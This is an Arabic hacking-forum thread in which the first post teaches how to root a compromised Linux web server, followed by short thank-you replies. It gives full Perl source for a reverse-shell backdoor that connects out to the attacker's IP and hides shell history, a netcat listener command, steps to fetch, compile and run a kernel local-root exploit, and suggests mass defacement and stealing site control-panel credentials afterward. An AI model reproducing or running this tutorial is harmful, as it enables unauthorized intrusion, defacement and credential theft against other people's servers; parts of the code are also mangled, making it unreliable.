1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] حصريآ ترويت سيرفر لينكس بأابسط الطرق

الموضوع في 'آمن المواقع والسيرفرات' بواسطة تــــركــــي, بتاريخ ‏24 ابريل 2013.

كاتب الموضوع : تــــركــــي المشاهدات : 7,045 الردود : 7 ‏24 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    تــــركــــي
    DeveloPer Plus

    عضو منذ:
    ‏25 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    [​IMG]

    بسم الله نبدأ

    اولا : ما هو الروت ؟

    تعتبر هذه الصلاحيه من اعلى الصلاحيات التي يستطيع الشخص الحاصل عليها
    بالتحكم الكامل بالسيرفر مثل اختراق جميع مواقع السيرفر
    وسحب الدومينات وغيرها يعني ملخص الروت هو السيرفر يصبح بيدك بالكامل


    ثانياً : كيفية الحصول على الرووت ؟

    بعد رفع الشل قم بانشاء ملف جديد بصيغة البيرل بالاسم
    butts.pl


    وادخل هذا الكود بالملف


    كود PHP:
    #!/usr/bin/perl
    use IO::Socket;
    $system    '/bin/bash';
    $ARGC=@ARGV;
    print 
    "IHS BACK-CONNECT BACKDOOR\n\n";
    if (
    $ARGC!=2) {
       print 
    "Usage: $0 [Host] [Port] \n\n";
       die 
    "Ex: $0 127.0.0.1 2121 \n";
    }
    use 
    Socket;
    use 
    FileHandle;
    socket(SOCKETPF_INETSOCK_STREAMgetprotoby****('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKETsockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print 
    "
    [*] Resolving Host****\n"
    ;
    print 
    "
    [*] Connecting... 
    $ARGV[0] \n";
    print 
    "
    [*] Spawning Shell \n"
    ;
    print 
    "
    [*] Connected to remote host \n"
    ;
    SOCKET->autoflush();
    open(STDIN">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print 
    "IHS BACK-CONNECT BACKDOOR  \n\n";
    system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; u**** -a;echo;
    echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "
    );
    system($system);
    #EOF

    ملحوظة هامة : يجب ان يكون السيرفر داعم للغة البيرل

    تم افتح بورت 8080 بالروتر


    بعد فتح البورت اكتب هذا الامر بالشل


    كود PHP:
    perl butts.pl yourip 8080

    yourip : الاي بي الخاص بك

    وتقدر تعرفة من الموقع

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    بعد تنفيذ الامر

    افتح الدوس ( Start > Run > CMD )

    واكتب الامر


    كود PHP:
    nc -vv ---p 8080
    ( ملحوظة يجب ان تكون اداة netcat مركبة على الويندوز )

    لتحميل الاداة

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    طريقة التركيب :-
    1- فك الضغط عن الملف

    2- انسخ الملفات التي بداخل Netcat الى المسار
    C:\WINDOWS\system32

    المهم نكمل ..

    بعد فتح الدوس وتنفيذ الامر

    سوف يتم الاتصال العكسي

    الان نبحث عن لوكال رووت على حسب اصدار الكيرنال للسيرفر

    ماهو اللوكال ؟

    اللوكال هو برنامج مبرمج بلغة c يقوم باستغلال ثغرات الكيرنل
    وهناك لوكلات مرتجمة وغير مترجة ونفرق بينهما عن طريق الامتداد
    فاذا كان الامتداد c فيعني اللوكال غير مترجم اما اذا كان امتداد اخر غيره فيعني اللوكال مترجم


    كيف اعرف اصدار الكيرنال ؟

    راح تلاقيه في الشل عند معلومات السيرفر فى الاعلي

    كيف ابحث عن اللوكال ؟
    ببساطة شديدة ادخل علي
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    فى اول خانة نكتب اصدار الكيرنال مثال
    2.6.18

    فى خانة type نختار local

    ونضغط على search

    راح يطلع لنا ثغرة اللوكال
    مثال

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    طبعا نحفظ اللوكال من خلال علامة [​IMG] فوق

    طيب الان بعد ما عملنا اتصال عكسي وحملنا اللوكال

    نرفعه فى نفس مسار الشل

    وبعد ما ترجمناه نعطيله تصريح 777 بالامر

    كود PHP:
    chmod local.c 777
    نحتاج الان نترجم اللوكال

    بالامر


    كود PHP:
    gcc local.-o local

    local.c : اسم ملف اللوكال

    الان بعد الترجمة

    نروح للـ دوس

    وننفذ


    كود PHP:
    ./local

    ما ننسي النقطة .

    الان روح شوف صلاحيتك !!

    root !!

    ننفذ الامر
    su

    للحصول على صلاحياتك كاملة


    ماذا بعد الروت ؟
    بعد ما حصلنا على الان تقدر تعمل اي شي تحبه مثل تغير جميع اندكسات السيرفر او ما يسمي بماس ديفاس
    تكدر تسحب جميع سي بنلات المواقع وتلغم وغيرها من الاشياء فلك الصلاحية بكل شي

     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    عنادك معذبني
    rank
    Developer

    عضو منذ:
    ‏13 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    شكرا اخي الكريم
    موفق )5:"
     


  4. غير متصل

    !Hackon!
    rankrank
    Developer

    عضو منذ:
    ‏14 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Hacking
    الإقامة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    يعطيك العافية سلمت يداك
    &:":​
     


  5. غير متصل

    мя.ωℓσ
    rank
    Developer

    عضو منذ:
    ‏23 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الوظيفة:
    Unemployed
    الإقامة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    طرح موفق
    بارك الله فيك
    جاري تقيم
    ك
     


  6. غير متصل

    ADNAN
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    وٌعليكم السلآم ورحمة الله وبركاتة
    جزاك الله كل خير
    &:":
    شكراً لك .
    :{1}:.
     


  7. غير متصل

    ŞŵęĕŦ
    rankrank
    Developer

    عضو منذ:
    ‏31 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    بَارَك الْلَّه فِيْك وَادَخِلك جَنَّاتِه جَنَّات الفِرْدَوْس الْأَعْلَى بِجَانِب الْأَنْبِيَاء وَالْصَّالِحِيْن يَارَب الْعَالَمِيْن
    جَارِي تَقْيِيْمُك :{7}:​
     


  8. غير متصل

    Mr-pass
    rank
    Developer

    عضو منذ:
    ‏26 يونيو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حصريآ ترويت سيرفر لينكس بأابسط الطرق

    ياسلام شكرا لك
    الله يجعلها في ميزان حسناتك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...